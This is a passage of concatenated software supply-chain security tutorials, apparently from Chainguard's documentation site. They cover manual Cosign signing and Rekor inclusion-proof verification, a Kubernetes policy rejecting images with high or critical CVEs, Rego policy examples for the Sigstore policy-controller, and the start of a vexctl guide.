"https://token.actions.githubusercontent.com" \ --certificate-identity "https://github.com/chainguard-dev/apko/.github/workflows/release.yaml@refs/tags/v0.19.9" \ apko_0.19.9_linux_arm64.tar.gz If you receive an error while verifying a binary with Cosign, then you know that there was a problem with creating the artifact, or that the file that you are verifying is corrupted or invalid. If that is the case, you should download a fresh copy and verify it again, or try a different version of the software with a working signature. --- ### Cosign: The Manual Way URL: https://edu.chainguard.dev/open-source/sigstore/cosign/cosign-manual-way/ Last Modified: March 29, 2023 Tags: Cosign, Overview When I first used Cosign, the software artifact signing CLI from the Sigstore project, I was amazed at how painless signing and verifying could be. For example, in the three commands below we create a public/private key pair, sign the text file, upload it to the Rekor transparency log, and verify the signature of the message. # create public/private keys $ cosign generate-key-pair Enter password for private key: Enter password for private key again: Private key written to cosign.key Public key written to cosign.pub # sign an artifact and output the signature $ cosign sign-blob --key cosign.key --output-signature sig message.txt Using payload from: message.txt Enter password for private key: tlog entry created with index: 2014997 Signature wrote in the file sig # verify the signature $ cosign verify-blob --key cosign.pub --signature sig message.txt tlog entry verified with uuid: 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e index: 7155742 Verified OK These quick commands show how easily Sigstore can be integrated into software security practices for any developer. I am the kind of person who always wants to know what’s going on under the hood. In this tutorial, I will walk you through doing Cosign the manual way so you too can understand the ins and outs of Cosign. Tools If you want to follow along you’ll need the following installed from your package manager of choice. I’ve noted the version used in this post but different minor versions should be fine. However, keep in mind that OpenSSL can drastically vary per system. openssl (3.0.8) Note: macOS uses libressl but it should still work jq (jq-1.6) curl (7.88.1) xxd (2022-01-14) Note: macOS requires coreutils installed via Homebrew go (go1.20.2) cosign (v2.0.0) rekor-cli (v1.0.1) The Blob A blob is an arbitrary collection of raw data like a picture or the executable binary that your source code produces. Cosign is capable of signing and verifying blobs. In our case, we’ll be signing a spooky message. Let’s write that message to a file. $ echo 'Beware The Blob!' > message.txt We’ll be using Cosign to sign this .txt file blob. Keys Before we can sign our message we need to generate a key pair. A key pair is a set of two keys, one private and one public, that can both sign/verify and encrypt/decrypt data. The private key is generated by some algorithm and the public key is derived from the private. There are a handful of different algorithms in use today, but the most common are RSA, ECDSA, and Ed25519. I fell deep down the rabbit hole learning about the differences between these algorithms, potential NSA backdoors and which versions of OpenSSL support a given algorithm. To keep things simple, we’ll use RSA but I encourage you to chase the rabbit on your own. The RSA algorithm in use today is defined by the Public Key Cryptography Standards #1 (PKCS1) specification. Let’s generate a 4096 bit RSA private key with OpenSSL. $ openssl genrsa -out key.pem 4096 Generating RSA private key, 4096 bit long modulus (2 primes) ...................................................................................................................... .............++++ .................++++ e is 65537 (0x010001) And from that private key we can output the public key. $ openssl rsa -in key.pem -pubout -out pub.pem writing RSA key $ cat key.pem -----BEGIN RSA PRIVATE KEY----- MIIJKgIBAAKCAgEA1BgrTaqV3zS+TOx6A/n+59ECOlXl7Uk7W82wNe7kUgfVAIGj Bci+Tc7O/nf/7GCMlzli/4n5WE0Ny2i/Kj4Ycsu6TUEcW6XaJSz4R4TBTHAcQiNq 8EkBQ2S5SuIIEekvCdVffkob3NtipOd/FaiLS1NVUAFcqOGHl2DYEkhP2puBS+Ad … $ cat pub.pem cat pub.pem -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1BgrTaqV3zS+TOx6A/n+ 59ECOlXl7Uk7W82wNe7kUgfVAIGjBci+Tc7O/nf/7GCMlzli/4n5WE0Ny2i/Kj4Y csu6TUEcW6XaJSz4R4TBTHAcQiNq8EkBQ2S5SuIIEekvCdVffkob3NtipOd/FaiL … We now have our keys but this is still a bit of magic. What is a PEM and what is this syntax? To answer that, let’s look at doing the same thing we just did in Go (omitting errors for brevity). // main.go package main import ( "crypto/rand" "crypto/rsa" "crypto/x509" "encoding/pem" "os" ) func main() { key, _ := rsa.GenerateKey(rand.Reader, 4096) b := x509.MarshalPKCS1PrivateKey(key) priv := pem.EncodeToMemory(&pem.Block{ Type: "RSA PRIVATE KEY", Bytes: b, }) os.WriteFile("key.pem", priv, 0600) b, _ = x509.MarshalPKIXPublicKey(key.Public()) pub := pem.EncodeToMemory(&pem.Block{ Type: "PUBLIC KEY", Bytes: b, }) os.WriteFile("pub.pem", pub, 0600) } Go’s crypto library is a joy to work with and the implementation for rsa.GenerateKey is worth peeking at. After calling it to generate our private key, we have a bunch of mathy bits that we need to represent somehow — enter Abstract Syntax Notation number One (ASN.1) and Distinguished Encoding Rules (DER). ASN.1 is the syntax we express our key in (think a .proto file) and DER is how we encode it (think Protobuf wire format). For a more detailed explanation, Let’s Encrypt has a great article. After calling x509.MarshalPKCS1PrivateKey our private key is an ASN.1 DER encoded PKCS1 byte array 😅. We still have one last step, however. Byte arrays aren’t human readable and are difficult to copypasta. As we often do when transmitting binary data we need to Base64 encode our bytes. Slapping on a header (-----BEGIN RSA PRIVATE KEY------) and footer (-----END RSA PRIVATE KEY-----) to help parsers identify our content finally leaves us with our Privacy-Enhanced Mail (PEM) file. PEM is a standard container for certificates and keys and was created to send binary data over email without messing with their contents. Since PKCS1 is specific to RSA our public key is serialized to Public Key Infrastructure X.509 (PKIX) which is a generic public key representation that includes information like the key algorithm. X.509 is the standard that defines the format for public key certificates like those used in your web browser. You can see above that the header is the generic -----BEGIN PUBLIC KEY-----. Time to Sign With our keys created, we are ready to use them to sign our message. We could sign the file in its entirety, but that would require the full file when verifying the signature. This is fine for small text files but when signing and uploading 3 gigabyte containers, it’s much more efficient to hash the payload and sign the digest. That way all that’s needed to verify a signature is the public key and the hash value. SHA-256 is most commonly used today for computing a message digest. $ openssl dgst -sha256 -sign key.pem -out message.txt.sig message.txt We can confirm our signing was successful by verifying the signature with the public key. openssl dgst -sha256 -verify pub.pem -signature message.txt.sig message.txt Verified OK Get Transparent Now that we have our signature, we can upload everything to the Rekor transparency log so others can find and verify it. Rekor supports a handful of different distinct types including Java JARs and RPM packages. The basic type is known as a Rekord but since we signed the hash of our file we’ll use a Hashed Rekord. Most of the fields in Rekor’s types require Base64 encoding, so let’s store these values in environment variables to make writing the payload easier. $ SIGSTORE_SIG_CONTENT=$(cat message.txt.sig | base64 | tr -d '\n') $ SIGSTORE_PUBLIC_KEY=$(cat pub.pem | base64 | tr -d '\n') $ SIGSTORE_HASH_CONTENT=$(shasum -a 256 message.txt | cut -d " " -f 1) Next, we’ll write out the payload to a file to make it easier to inspect and use in a request. $ cat <<EOF > hashedrekord.json { "apiVersion": "0.0.1", "kind": "hashedrekord", "spec": { "data": { "hash": { "algorithm": "sha256", "value": "$SIGSTORE_HASH_CONTENT" } }, "signature": { "content": "$SIGSTORE_SIG_CONTENT", "publicKey": { "content": "$SIGSTORE_PUBLIC_KEY" } } } } EOF Do a quick sanity check that our payload was created successfully. $ cat hashedrekord.json { "apiVersion": "0.0.1", "kind": "hashedrekord", "spec": { "data": { "hash": { "algorithm": "sha256", "value": "d8d321 … We’re now ready to send our data off to Rekor. Let’s save the response to a file so we can poke around. $ curl -X POST -H "Content-Type: application/json" --data-binary @hashedrekord.json https://rekor.sigstore.dev/api/v1/log/entries > response.json The top-level key of the response will be the database shard ID (16 characters) + entry UUID (64 characters) in the transparency log. # top level key $ jq -r 'keys[0]' response.json 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e # shard id $ jq -r 'keys[0]' response.json | cut -c -16 24296fb24b8ad77a # entry uuid $ jq -r 'keys[0]' response.json | cut -c 17- 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e The entry UUID is actually the hash of the Merkle Tree leaf node for our entry. I won’t attempt to explain Merkle Trees in depth, but the basic idea is that inclusion of a node can be cryptographically verified all the way up to the root hash of the tree. RFC 6962 explains how this works and we’ll step through this verification in a bit. For now, let’s see where this hash comes from. The RFC states that the hash of a leaf node is SHA-256(0x00 || d(n)). That is, the SHA 256 sum of the hex byte 0x00 concatenated to the contents of the entry, which in our case is the Hashed Rekord. We can do this in bash with process substitution. $ shasum -a 256 <(cat <(printf '\x00') <(jq -rcj '.' hashedrekord.json )) | cut -d ' ' -f 1 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e Now let’s retrieve the entry from Rekor using this ID and save it to a file. If you inspect the contents, you’ll notice a handful of new fields. $ curl https://rekor.sigstore.dev/api/v1/log/entries/24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e > entry.json First, let’s check that our Hashed Rekord is in the body. $ diff <(jq -rc '.[].body' entry.json | base64 -d) <(jq -rcj '.' hashedrekord.json) The body matches, which confirms that our entry was created, but how would the recipient of our message go about verifying and proving that for themselves? That’s where our next step comes in. Trust but Verify Well, there are a few important things they must check: That the message digest matches the signature for the public key inside the Hashed Rekord. (We’ll leave this as an exercise for you, dear reader: you can reverse the steps from earlier.) That we were in possession of the key when the message was signed. (You could check AWS/GCP KMS access logs) That the entry is indeed included in the transparency log. (RFC 6962) The next thing that we can verify in the entry is the Signed Entry Timestamp. I’ll leave this explanation to our friend Hayden Blauzvern. As a transparency log, Rekor provides cryptographic proofs of inclusion in a log. Fetching an inclusion proof requires querying the log. The log returns a checkpoint (signed tree head) as a commitment to the current state of the log and the inclusion proof. Requiring an online lookup for every entry that you’re verifying could cause a lot of increased latency in a verifier, and requires that the log have very high availability. Ideally, Rekor could provide an inclusion proof that could be verified offline – Rekor does this with a “signed entry timestamp” (SET). An SET is a structure signed with the same private key that signs Rekor’s checkpoints. It is a “promise” of inclusion. It does not contain cryptographic proof, but since it is signed by the log, the log is committing to including the entry. A verifier that trusts Rekor can verify the SET without needing to do an online lookup. Asynchronously, for additional assurances, a log monitor can verify that an entry is truly present in the log for each SET a verifier views. We can start by fetching Rekor’s current public key. $ curl https://rekor.sigstore.dev/api/v1/log/publicKey > rekor.pub Next we can pull the SET out of the entry into its own file. jq -r '.[].verification.signedEntryTimestamp' entry.json | base64 -d > set.sig The attestation and verification fields in the entry are not included in what is signed by the timestamping authority, so let’s remove them. jq -cj '.[] | del(.attestation, .verification)' entry.json > set.json Finally, we can verify the SET. $ openssl dgst -sha256 -verify rekor.pub -signature set.sig set.json Verified OK The last thing we need to verify is that our entry was actually included in the Merkle tree. As mentioned earlier, this is defined in RFC 6962. RFC 9162 will eventually replace 6962 and the pseudocode is easier to follow (read through it first). What follows is a bash implementation of this algorithm that I am equally proud of and upset by. It builds on everything we’ve covered so far with the addition of the xxd tool. xxd is used to convert between binary and hex and we use it to build up the binary representation of our tree nodes from the hashes in our entry. These hashes should eventually compute to the rootHash. #!/usr/bin/env bash set -euo pipefail # https://datatracker.ietf.org/doc/rfc9162/#:~:text=2.1.3.2.%20%20Verifying%20an%20Inclusion%20Proof entry=$(cat entry.json) mapfile -t hashes < <(jq -rc '.[].verification.inclusionProof.hashes | .[]' <<< "$entry") rootHash=$(jq -r '.[].verification.inclusionProof.rootHash' <<< "$entry") startHash=$(shasum -a 256 <(cat <(printf '\x00') <(jq -r '.[].body' <<< "$entry" | base64 -d)) | cut -d ' ' -f 1) logIndex=$(jq -r '.[].verification.inclusionProof.logIndex' <<< "$entry") treeSize=$(jq -r '.[].verification.inclusionProof.treeSize' <<< "$entry") if [[ $logIndex -ge $treeSize ]]; then echo "verification failed! log index larger than tree size" exit 1 fi echo -e "0x00 || leaf\nstart: ${startHash}\n\n" echo -e "want: ${rootHash}\n\n" r="${startHash}" fn="${logIndex}" sn=$(( treeSize - 1 )) for i in "${!hashes[@]}" do if [[ $sn -eq 0 ]]; then echo "verification failed! tree is incomplete" exit 1 fi lsb=$(( fn & 1 )) if [[ ($lsb -eq 1) || ($fn -eq $sn) ]]; then echo "0x01 || ${hashes[i]}|| ${r}" r=$(shasum -a 256 <(cat <(printf '\x01') <(xxd -r -p <<< "${hashes[i]}") <(xxd -r -p <<< "${r}")) | cut -d ' ' -f 1) while [[ ($lsb -eq 0) || $fn -eq 0 ]]; do fn=$(( fn >> 1 )) sn=$(( sn >> 1)) lsb=$(( fn & 1 )) done else echo "0x01 || ${r}|| ${hashes[i]}" r=$(shasum -a 256 <(cat <(printf '\x01') <(xxd -r -p <<< "${r}") <(xxd -r -p <<< "${hashes[i]}")) | cut -d ' ' -f 1) fi fn=$(( fn >> 1 )) sn=$(( sn >> 1)) echo -e "${r}\n\n" done if [[ "${r}" == "${rootHash}" ]]; then echo "verification successful! got: ${r}want: ${rootHash}" exit 0 else echo "verification failed! got: ${r}want: ${rootHash}" exit 1 fi Running this monstrosity, we can see that verification was successful! $ ./verify.sh ./verify.sh 0x00 || leaf start: 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e want: b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad 0x01 || 2fb6c414fe3710a0ca820e20a352d827e920ef94de1a62cf032f0b508583d343 || 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e 16e4d477cd081846cd410daf07299d17056dc5b31f77c40a716e8520a0457b1c 0x01 || af8df402b3a2f95a2e11e693d0401237c23ab1ef29844ff5b122ef7b868eb802 || 16e4d477cd081846cd410daf07299d17056dc5b31f77c40a716e8520a0457b1c 6e76df3263704eccc1c047bbc1704bbf8071a817a0c5626a2308da7d9bf3cae9 0x01 || 54b4fb9c6af94d6c8c9361176de175cb26334f26cf0c2238c8dda23ca256f7b1 || 6e76df3263704eccc1c047bbc1704bbf8071a817a0c5626a2308da7d9bf3cae9 dff1cbc7728565c69328b8618b14fe7033baa5e8936098ec8933009c3988104e 0x01 || dff1cbc7728565c69328b8618b14fe7033baa5e8936098ec8933009c3988104e || 7e12ab8d4338713ca3a427db4eb41ecdbe3e6ae15fd490716409d8c89c63ae1d 6ad77f4dcac7a5d47d3087283129429d50cd2d9a4410f5d4900afd78e33ad40a 0x01 || 94cc41349e90789f7f80dce5df0339373749400539d41c8a3ecca485e3c92603 || 6ad77f4dcac7a5d47d3087283129429d50cd2d9a4410f5d4900afd78e33ad40a 4fdd278ae02e4cbae8dbc0650e4d3282e208ffec9603c68f73bcafe328488ac7 0x01 || a50a2b2e4a506dd075f59dab6db168164eb52e437756f53162f04be6ce0b5c3b || 4fdd278ae02e4cbae8dbc0650e4d3282e208ffec9603c68f73bcafe328488ac7 65cfed18ce41b642653912e86402b45d5df0109de29edbf0cb20c62f3444fdc0 0x01 || 65cfed18ce41b642653912e86402b45d5df0109de29edbf0cb20c62f3444fdc0 || 52f10e8d704883a11ed3f157d079afffd814f563d5c013d5752ea81744aac4b5 749a1795a60841356d1928b78af94814b127b7fea9aede093eb39b410e166f27 0x01 || a0441f106e6bb9ec4acc5f3126beea2ae60b721648c3c7ba741368458cef89c6 || 749a1795a60841356d1928b78af94814b127b7fea9aede093eb39b410e166f27 5d0ebe394bc76ddf46868b03466d3042b4efcb70760f997731ee6758c272208f 0x01 || 5d0ebe394bc76ddf46868b03466d3042b4efcb70760f997731ee6758c272208f || df2f19f10ed0def555c68cda80b4fdd8f535ba929c1cfc36d9c789732d20e305 9138f73ed31973bab8e005465ee04bec1cfb2a56e0f6eb9f316d964127c9877e 0x01 || 9138f73ed31973bab8e005465ee04bec1cfb2a56e0f6eb9f316d964127c9877e || 93663301e472c817961f75499d26844b246665d275538e5a24e16b065cda7afe 874589aee5388025c078a59e1f6e66ac65d185cdc766620860ba0680cfbd26bc 0x01 || c2ed30483aafe58267a6740c2fb76408eb6366ceb48c9f0509c0f2c04b101f05 || 874589aee5388025c078a59e1f6e66ac65d185cdc766620860ba0680cfbd26bc 0926480781b8d7bc2790d7e63972846bf98b79b47a1968a47f9c0992f319da44 0x01 || b593f43b0ca6048ca4e1564817b0381f25f66d6c6b205673d6e6bc1c582a02bd || 0926480781b8d7bc2790d7e63972846bf98b79b47a1968a47f9c0992f319da44 1af9b80f354a6c824fe9893f7278ce192dea39f4cb800707681947408b9f8c60 0x01 || b8f5ef19b43c82a6deee74a4b36c41a4b7f030d46f9862913ae5ab74177d7a34 || 1af9b80f354a6c824fe9893f7278ce192dea39f4cb800707681947408b9f8c60 b76bf4a5ee7dbf09372243c01c86d620fc3581e8c4b5659ce549b397ec9608bc 0x01 || 0b4e9c3dce66ce4f393b3b3ae5f141a0d20902538d5fc99bd030348672b69b81 || b76bf4a5ee7dbf09372243c01c86d620fc3581e8c4b5659ce549b397ec9608bc 31fcf995aaadf0cc7ce249b3ae06fb73653648c6279dd8401a75e59538a85718 0x01 || 9a991dc567e6dd4fa21d6235df691252ca81eab5e1301c849c8aa2151363e6a7 || 31fcf995aaadf0cc7ce249b3ae06fb73653648c6279dd8401a75e59538a85718 36a05fd84e2e4f497a41a3e6e633b59a49873d731e1d4e2e5c91ecb5ece28091 0x01 || 732af72ebcc0c8a16dbdba657c7b755d2097691d08882f308dbc5b133372c170 || 36a05fd84e2e4f497a41a3e6e633b59a49873d731e1d4e2e5c91ecb5ece28091 5219998b60322aa7e1aa3c02cf15bedc67d89876dfc46f1b89937c8e496aa947 0x01 || 2747468d0ed5e5b1138bba7b7968367a9842437d9004b3166391f115cb867d1e || 5219998b60322aa7e1aa3c02cf15bedc67d89876dfc46f1b89937c8e496aa947 b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad verification successful! got: b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad want: b054e63c475d8751b14b51a54255918e4ae0aa26e0ee60c9c7ee3e333396c4ad This is the same flow that the Rekor CLI will step through. $ rekor-cli verify --uuid 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e Current Root Hash: f0e0de7e6b03385bc086c46703b7a2abbbd16ae10fc28b3f480125b1898536fb Entry Hash: 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e Entry Index: 7155742 Current Tree Size: 2995354 Checkpoint: rekor.sigstore.dev - 2605736670972794746 2995354 8ODefmsDOFvAhsRnA7eiq7vRauEPwos/SAElsYmFNvs= Timestamp: 1668548431487913062 — rekor.sigstore.dev wNI9ajBEAiB/Lcxmn82//9QIwqVPbVSgzEAfACmAnZNLD9RuIH9QiAIgLToW3Bd8Y26Wwz3JuuZBsC1/IhUExSbu1NET/nzoajc= Inclusion Proof: SHA256(0x01 | 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e | 2fb6c414fe3710a0ca820e20a352d827e920ef94de1a62cf032f0b508583d343) = 768fdb04aac9d523a34adbfeecd3268f920ff250ffc809867bae28bd10eb5f15 … If you have any question you can reach me @eddiezane! Stay spooky… Special thanks to Appu Goundan and Hayden Blauzvern. --- ### Limit High or Critical CVEs in your Images Workloads URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/critical-cve-policy/ Last Modified: May 10, 2024 Tags: policy-controller, Policies, Open Source While Common Vulnerabilities and Exposures (CVEs) are undesirable at any time, the software security standards of certain industries strictly regulate the allowance of high or critical CVEs. For example, in the payment industry, the PCI Security Standards Council requires that all vulnerabilities with a Common Vulnerability Scoring System (CVSS) score higher than 4 are addressed. For engineers and security professionals working in these contexts, it’s essential to know if container images have high or critical CVEs before deploying them. But tracking these CVEs manually can be difficult, especially when regularly pulling or updating large numbers of images for your workloads. Policy solution: vulnerability attestation with no high or critical CVEs One way of addressing this concern is to use Chainguard’s policy that checks an image’s attestation to determine whether the image has any high or critical CVEs. Used with an admissions controller or the open source Sigstore policy-controller), this policy enables you to restrict images or receive a warning whenever an image fails to meet the policy’s requirements. For this policy to work, the image under inspection must have an attached attestation containing output from its vulnerability scan. These vulnerability attestations are typically generated by the upstream maintainer who inserts the output of an image’s vulnerability scan into a vulnerability attestation and then signs the attestation to assure downstream users of its integrity. If the image doesn’t have a vulnerability attestation or you want to double check the attestation, you can also create a vulnerability attestation yourself using a scanner like Trivy. In either case, the vulnerability attestation is checked by this policy to determine whether the image contains any high or critical vulnerabilities. Here is the policy in full: ############################################################################################# # To generate an attestation with a scan report and attest it to an image follow these steps: # $ trivy image --format cosign-vuln --output vuln.json <IMAGE> # $ cosign attest --key /path/to/cosign.key --type https://cosign.sigstore.dev/attestation/vuln/v1 --predicate vuln.json <IMAGE> # # $ cosign verify-attestation --key /path/to/cosign.pub --type --type https://cosign.sigstore.dev/attestation/vuln/v1 <IMAGE> ############################################################################################# apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: vuln-no-high-or-critical-rego annotations: catalog.chainguard.dev/title: Fail on high or critical CVEs catalog.chainguard.dev/description: Vulnerability attestation with no High or Critical CVEs catalog.chainguard.dev/labels: attestation,rego spec: images: - glob: "**" authorities: - name: my-authority key: # REPLACE WITH YOUR PUBLIC KEY! data: | -----BEGIN PUBLIC KEY----- MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAESWmPfv6b083TNcwY4SlYcZULn7jX /vfUyU7CPr2zssLc3+8SWAv2ZY59pofKnvYBp9dNiNwVTkrxab1bcpocVg== -----END PUBLIC KEY----- attestations: - name: must-not-have-high-critical-cves predicateType: https://cosign.sigstore.dev/attestation/vuln/v1 policy: type: rego data: | package sigstore isCompliant[response] { input.predicateType = "https://cosign.sigstore.dev/attestation/vuln/v1" filteredHighSeverity = [c | c := input.predicate.scanner.result.Results[_].Vulnerabilities[_]; c.Severity == "HIGH"] filteredCriticalSeverity = [c | c := input.predicate.scanner.result.Results[_].Vulnerabilities[_]; c.Severity == "CRITICAL"] result = ((count(filteredHighSeverity) + count(filteredCriticalSeverity)) == 0) errorMsg = sprintf("Found HIGH '%d' and CRITICAL '%d' vulnerabilities", [count(filteredHighSeverity) ,count(filteredCriticalSeverity)]) warnMsg = "" response := { "result" : result, "error" : errorMsg, "warning" : warnMsg } } Implementing this policy You can use this policy freely with the open source Sigstore policy-controller to block new deployments of images that don’t meet the policy’s requirements. --- ### Rego Policies URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/chainguard-enforce-rego-policies/ Last Modified: May 10, 2024 Tags: Open Source, Procedural, Policy, Reference, SBOM The Sigstore Policy Controller supports the Rego Policy Language, which is a declarative policy language that is used to evaluate structured input data such as Kubernetes manifests and JSON documents. This feature enables users to apply policies that can evaluate Kubernetes admission requests and object metadata to make comprehensive decisions about the workloads that are admitted to their clusters. Rego support also enables users to enhance existing cloud-native policies by adding additional software supply chain security checks. If you would like to write a Rego policy from scratch, or learn more about how to use this format, you can follow this guide. Rego Policy Template # Copyright 2022 Chainguard, Inc. # SPDX-License-Identifier: Apache-2.0 apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: my-rego-policy spec: images: [glob: '**'] authorities: [static: {action: pass}] mode: warn policy: includeSpec: true type: rego data: | package sigstore default isCompliant = false isCompliant { # Rego logic goes here; must evaluate to true for policy to pass } In this policy, you should change the name to be meaningful to you. The spec fields are defined at ClusterImagePolicySpec. By default, this policy will apply to all images, as noted with the glob: '**' parameter. If we keep this as is, this means that we are evaluating everything running in our cluster. The authorities field is used in evaluating image signatures. Since we aren’t using signatures in this policy, we will set it to pass. This will be a common setting in Rego-based policies unless you are also evaluating signatures simultaneously. The policy is being implemented in warn mode, which can generate an alert through CloudEvents to notify administrators of violations without blocking deployments. You can alternatively use mode: enforce to block deployments that violate the policy. The Rego policy itself is defined within the policy section. The first requirement is to include the input data that is to be evaluated. By default, the image in the registry is available. To include additional metadata, one of more of the following should be set: includeSpec: allows you to access the fields in the spec portion of the Kubernetes manifest, including the container configuration, image names, replicas, resources, and more. includeObjectMeta: allows you to access the fields in the metadata: portion of the manifest, including the object’s name and labels. includeTypeMeta: allows access to the top level fields in the manifest, such as the kind and apiVersion. fetchConfigFile: fetches the OCI config file from the registry, which contains metadata about the image in the registry. Rego policies must specify type: rego and the data field must contain package sigstore. For the policy to pass, the isCompliant field must evaluate to true within the curly braces. The isCompliant Boolean is set to false by default, and the logic in the braces must flip the boolean to true for the policy to pass. If you define multiple conditions within the isCompliant braces, these can be combined using the AND keyword to the Boolean logic, meaning that each condition must pass for isCompliant to resolve to true. You can also define multiple evaluations (meaning, multiple sets of isCompliant braces) in the same policy. You would combine these in your policy with the OR keyword, meaning that if any of the stated conditions evaluate to true, then the isCompliant Boolean will also be true. This same structure must be present in all Rego-based policies. Rego Policy to Check Metadata Labels You can set a Rego policy to ensure that it is compliant with certain labels within your metadata. For example, within the production environment (with the “production” label) you can ensure that the compliance team is the approver. isCompliant { input.metadata.labels.env == "production" input.metadata.labels.approved-by == "compliance-team" } Here, the policy is requiring and checking that the labels exist in the ObjectMeta data. This policy will evaluate to true only if both labels exist in the metadata portion of the manifest. Rego Policy to Check Kubernetes Pod Security As a cluster-level resource, a Kubernetes Pod Security Policy allows a cluster administrator to control security-sensitive aspects of a Pod’s specification. This defines a set of conditions that a Pod must meet so that it can be allowed into the cluster. You can think of it as a built-in admission controller which enforces security policies on Pods across a cluster. This policy checks to make sure our Pod security specifications are properly set. isCompliant { input.spec.hostNetwork == "false" input.spec.hostPID == "false" input.spec.hostIPC == "false" } Here, hostNetwork refers to the host’s networking namespace, hostPID refers to the host process ID namespace, and hostPIC refers to the IPC (interprocess communication) namespace. This policy will pass if all the restricted values are set to false. Rego Policy that Disallows Specified Images In some cases, you may want to evaluate an item elsewhere in the manifest, such as an image source that is included within the container specs of the same manifest. For example, a manifest may have a snippet with a disallowed NGINX image from Docker Hub: spec: containers: - name: "your-container-name" image: nginx:latest - name: "another-container-name" image: nginx In this case, within the policy section of your Rego policy, you’ll need to iterate over the image array and check all the relevant fields for the restricted value. You can use the [_] syntax to iterate through the array. You can use the not keyword in conjunction with the contains() built-in function to evaluate all the items within the array. isCompliant { result:= input.spec.containers.image[_] not contains(result,"docker.io") } This policy will not admit Pods that come from docker.io. Rego Policy that Disallows Privilege Escalation in Pods This example Rego policy will disallow privilege escalation in Pods following the Kubernetes Pod Security Baseline Standard. The Baseline Standard is a minimally restrictive policy which prevents known privilege escalations and allows the default and minimally specified Pod configuration. isCompliant { filteredContainers = [c | c := input.spec.containers[_]; c.securityContext.allowPrivilegeEscalation == true ] filteredInitContainers = [c | c := input.spec.initContainers[_]; c.securityContext.allowPrivilegeEscalation == true ] filteredEphemeralContainers = [c | c := input.spec.ephemeralContainers[_]; c.securityContext.allowPrivilegeEscalation == true ] (count(filteredContainers) + count(filteredInitContainers) + count(filteredEphemeralContainers)) == 0 } Setting the allowPrivilegeEscalation Boolean controls whether a process can gain more privileges than its parent process. This value will evaluate to true when the container is run as privileged. You can review more information about how to configure a security context for a Pod or Container on the Kubernetes docs. This Rego policy shows a method of declaring a variable and using it to count up all the instances of privilege escalation across Pod types, and evaluate that the final count is 0 in order for the policy to pass. Rego Policy that Checks Maximum Age of Images This example Rego policy checks the maximum age (in days) allowed for an image running in your cluster. Policy Controller measures this through the created field of a container image’s configuration. This ensures that your images are regularly updated and maintained. Note that some build tools may fail this check due to using a fixed time (like the Unix epoch) for creation in their reproducible builds. However, many of these tools support specifying SOURCE_DATE_EPOCH, which aligns creation time with the date of the source commit. policy: fetchConfigFile: true type: "rego" data: | package sigstore nanosecs_per_second = 1000 * 1000 * 1000 nanosecs_per_day = 24 * 60 * 60 * nanosecs_per_second # Change this to the maximum number of days you would like to allow maximum_age = 30 * nanosecs_per_day default isCompliant = false isCompliant { created := time.parse_rfc3339_ns(input.config[_].created) time.now_ns() < created + maximum_age } Here, the policy defines a variable for the maximum_age, in this case set to 30, which you can change to the number of days old you would permit an image to be. Within the isCompliant braces, the Rego policy leverages time to evaluate whether the current time is less than the maximum allowed age. To review the different methods of implementing time within Rego, review the Time reference documentation. Rego Policies that Define Custom Error and Warning Messages Rego policies have the added benefit of allowing you to define custom error and warning messages. This example attestations block requires clusters to have a vulnerability report in order to be deemed compliant. Notice, though, that it also defines an errorMsg string. attestations: - name: must-have-vuln-report predicateType: vuln policy: type: rego data: | package sigstore isCompliant[response] { result = (input.predicateType == "chainguard.dev/attestation/vuln/v1") errorMsg = "Not found expected predicate type 'chainguard.dev/attestation/vuln/v1'" warnMsg = "" response := { "result" : result, "error" : errorMsg, "warning" : warnMsg } } Here, the custom error message reads Not found expected predicate type 'chainguard.dev/attestation/vuln/v1'. Rather than returning the default error, Policy Controller will return this string as a custom error message. Notice, too, that the previous example defines a warnMsg variable. Policy Controller will only return a warning message to the caller if the policy in question is in warn mode, so in that case it was left as an empty string. The following attestations block is similar to the previous one, but this time it defines the warnMsg variable to be used as a custom warning message. attestations: - name: must-have-vuln-report predicateType: vuln policy: type: rego data: | package sigstore isCompliant[response] { result = (input.predicateType == "cosign.sigstore.dev/attestation/vuln/v1") errorMsg = "" warnMsg = "WARNING: Found an attestation with predicate type 'cosign.sigstore.dev/attestation/vuln/v1'" response := { "result" : result, "error" : errorMsg, "warning" : warnMsg } } Defining custom error and warning messages with Rego can help with troubleshooting, as they can explain specific policy issues that otherwise may not be clearly understandable. Learn More To understand more about the Rego policy format, you can review the Rego Policy Reference which includes details on assignment and equality, arrays, objects, sets, and rules. --- ### Getting Started with OpenVEX and vexctl URL: https://edu.chainguard.dev/open-source/sbom/getting-started-openvex-vexctl/ Last Modified: May 21, 2024 Tags: SBOM, VEX, Procedural The vexctl CLI is a tool to make VEX work. As part of the open source OpenVex project, vexctl enables you to create, apply, and attest VEX (Vulnerability Exploitability eXchange) data in order to filter out false positive security alerts. The vexctl tool was built to help with the creation and management of VEX documents, communicate transparently to users as time progresses, and enable the “turning off” of security scanner alerts of vulnerabilities known not to affect a given product. Using VEX, software authors can communicate to their users that an otherwise vulnerable component has no security implications for their product. This tutorial will walk you through some common commands in vexctl. Installing vexctl If you would like to install vexctl on your local or virtual machine, you will need Go 1.16 or higher. You can install by following the official Go documentation. Using Go, run the following to install vexctl: go install 